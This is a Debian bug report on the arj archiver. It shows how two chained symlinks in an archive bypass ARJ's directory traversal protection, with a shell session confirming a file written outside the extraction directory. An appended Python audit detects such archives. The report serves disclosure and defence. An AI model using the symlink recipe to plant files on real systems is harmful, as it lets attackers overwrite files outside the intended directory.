Package: arj
Version: 3.10.22-15
Tags: security

The attached archive contains two symlinks and a regular file:
cur -> .
par -> cur/..
par/moo
This setup defeats ARJ's directory traversal protections:
$ ls ../moo
/bin/ls: cannot access '../moo': No such file or directory
$ arj x traversal-dirsymlink2.arj
ARJ32 v 3.10, Copyright (c) 1998-2004, ARJ Software Russia. [04 Jun 2016]
Processing archive: traversal-dirsymlink2.arj
Archive created: 2017-07-06 22:51:02, modified: 2017-07-06 22:51:02
Extracting cur (SymLink) OK
Extracting par (SymLink) OK
Extracting par/moo OK
3 file(s)
$ ls ../moo
../moo
--
Jakub Wilk
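Added example, not part of the original report and not ARJ's code: a pre-extraction audit that replays the member list in order and resolves each path through symlinks the archive itself creates, next to a purely lexical per-entry check that accepts all three members. ENTRIES is a constructed model of the listing above; the function names are hypothetical.

```python
import posixpath

# Constructed model of the archive in the report: (member name, symlink target or None)
ENTRIES = [("cur", "."), ("par", "cur/.."), ("par/moo", None)]

def lexical_ok(path):
    """Naive per-entry check: normalise the string, reject absolute or '..'-led paths."""
    norm = posixpath.normpath(path)
    return not (norm.startswith("/") or norm == ".." or norm.startswith("../"))

def resolve(path, links, base=(), depth=0):
    """Resolve path relative to base (components under the extraction root),
    following symlinks recorded in links. Returns a tuple, or None on escape."""
    if depth > 40 or path.startswith("/"):
        return None                      # symlink loop or absolute target
    cur = list(base)
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not cur:
                return None              # climbed above the extraction root
            cur.pop()
            continue
        cand = tuple(cur) + (part,)
        if cand in links:                # member created earlier as a symlink
            res = resolve(links[cand], links, tuple(cur), depth + 1)
            if res is None:
                return None
            cur = list(res)
        else:
            cur.append(part)
    return tuple(cur)

def audit(entries):
    """Walk entries in extraction order; return members that land outside the root."""
    links, bad = {}, []
    for name, target in entries:
        parent, _, leaf = name.rpartition("/")
        where = resolve(parent, links)   # directory the member would really land in
        if where is None:
            bad.append(name)
            continue
        if target is not None:
            if resolve(target, links, where) is None:
                bad.append(name)         # the link itself points outside the root
            links[where + (leaf,)] = target  # still recorded so later members are flagged
    return bad
```

An extractor applying this would refuse to create `par`, after which `par/moo` can only land inside the extraction directory.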

